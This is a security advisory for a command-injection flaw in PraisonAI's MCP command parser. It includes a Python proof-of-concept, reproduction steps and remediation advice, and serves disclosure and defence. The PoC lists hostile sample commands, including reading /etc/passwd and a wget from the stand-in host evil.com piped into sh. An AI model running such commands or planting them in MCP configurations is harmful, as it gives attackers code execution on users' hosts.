GHSA-9qhq-v63v-fv3j

Summary

The fix for PraisonAI's MCP command handling does not add a command allowlist or argument validation to parsemcpcommand(), allowing arbitrary executables like bash, python, or /bin/sh with inline code execution flags to pass through to subprocess execution.

Affected Package

• Ecosystem: PyPI
• Package: MervinPraison/PraisonAI
• Affected versions: < 47bff65413be
• Patched versions: >= 47bff65413be

Details

The vulnerability exists in src/praisonai/praisonai/cli/features/mcp.py in the MCPHandler.parsemcpcommand() method. This function parses MCP server command strings into executable commands, arguments, and environment variables. The pre-patch version performs no validation on the executable or arguments.

The fix commit 47bff654 was intended to address command injection, but the patched parsemcpcommand() still lacks three critical controls: there is no ALLOWED_COMMANDS allowlist of permitted executables (e.g., npx, uvx, node, python), there is no os.path.basename() validation to prevent path-based executable injection, and there is no argument inspection to block shell metacharacters or dangerous subcommands.

Malicious MCP server commands such as python -c 'import os; os.system("id")', bash -c 'cat /etc/passwd', and /bin/sh -c 'wget http://evil.com/shell.sh | sh' are all accepted by parsemcpcommand() and passed directly to subprocess execution without filtering.

PoC

#!/usr/bin/env python3
"""
CVE-2026-34935 - PraisonAI command injection via parse_mcp_command()
Tests against REAL PraisonAI mcp.py from git at commit 66bd9ee2 (parent of fix 47bff654).
The pre-patch parse_mcp_command() performs NO validation on the executable or
arguments, allowing arbitrary command execution via MCP server commands.
Repo: https://github.com/MervinPraison/PraisonAI
Patch commit: 47bff65413beaa3c21bf633c1fae4e684348368c
"""
import sys
import os
import importlib.util
## Load the REAL mcp.py from the cloned PraisonAI repo at vulnerable commit
MCP_PATH = "/tmp/praisonai_real/src/praisonai/praisonai/cli/features/mcp.py"
def load_mcp_handler():
    """Load the real MCPHandler class from the vulnerable source."""
    base_path = "/tmp/praisonai_real/src/praisonai/praisonai/cli/features/base.py"
    spec_base = importlib.util.spec_from_file_location("features_base", base_path)
    mod_base = importlib.util.module_from_spec(spec_base)
    sys.modules["features_base"] = mod_base
    with open(MCP_PATH) as f:
        source = f.read()
    source = source.replace("from .base import FlagHandler", """
class FlagHandler:
    def print_status(self, msg, level="info"):
        print(f"[{level}] {msg}")
""")
    ns = {"__name__": "mcp_module", "__file__": MCP_PATH}
    exec(compile(source, MCP_PATH, "exec"), ns)
    return ns["MCPHandler"]

def main():
    MCPHandler = load_mcp_handler()
    handler = MCPHandler()
    print(f"Source file: {MCP_PATH}")
    print(f"Loaded MCPHandler from real PraisonAI source")
    print()
    malicious_commands = [
        "python -c 'import os; os.system(\"id\")'",
        "node -e 'require(\"child_process\").execSync(\"whoami\")'",
        "bash -c 'cat /etc/passwd'",
        "/bin/sh -c 'wget http://evil.com/shell.sh | sh'",
    ]
    print("Testing parse_mcp_command with malicious inputs:")
    print()
    all_accepted = True
    for cmd_str in malicious_commands:
        try:
            cmd, args, env = handler.parse_mcp_command(cmd_str)
            print(f"  Input:   {cmd_str}")
            print(f"  Command: {cmd}")
            print(f"  Args:    {args}")
            print(f"  Result:  ACCEPTED (no validation)")
            print()
        except Exception as e:
            print(f"  Input:   {cmd_str}")
            print(f"  Result:  REJECTED ({e})")
            all_accepted = False
            print()
    if all_accepted:
        print("ALL malicious commands accepted without validation!")
        print()
        with open(MCP_PATH) as f:
            source = f.read()
        has_allowlist = "ALLOWED_COMMANDS" in source or "allowlist" in source.lower()
        has_basename_check = "os.path.basename" in source
        has_validation = has_allowlist or has_basename_check
        print(f"Has command allowlist: {has_allowlist}")
        print(f"Has basename check: {has_basename_check}")
        print(f"Has any command validation: {has_validation}")
        print()
        if not has_validation:
            print("COMMAND INJECTION: parse_mcp_command() has NO command validation!")
            print("  - No allowlist of permitted executables")
            print("  - No argument inspection")
            print("  - Arbitrary commands passed directly to subprocess execution")
            print()
            print("VULNERABILITY CONFIRMED")
            sys.exit(0)
    print("Some commands were rejected - validation present")
    sys.exit(1)

if __name__ == "__main__":
    main()

Steps to reproduce:

1. git clone https://github.com/MervinPraison/PraisonAI /tmp/praisonai_real
2. cd /tmp/praisonai_real && git checkout 47bff654~1
3. python3 poc.py

Expected output:

VULNERABILITY CONFIRMED
parse_mcp_command() has NO command validation; arbitrary commands passed directly to subprocess execution without an allowlist.

Impact

An attacker who can influence MCP server configuration (e.g., via a malicious plugin or shared configuration file) can execute arbitrary system commands on the host running PraisonAI, enabling full remote code execution, data exfiltration, and lateral movement.

Suggested Remediation

Implement a strict allowlist of permitted executables (e.g., npx, uvx, node, python) in parsemcpcommand(). Validate commands against os.path.basename() to prevent absolute path injection. Inspect arguments for shell metacharacters and dangerous subcommand patterns (e.g., -c, -e flags enabling inline code execution).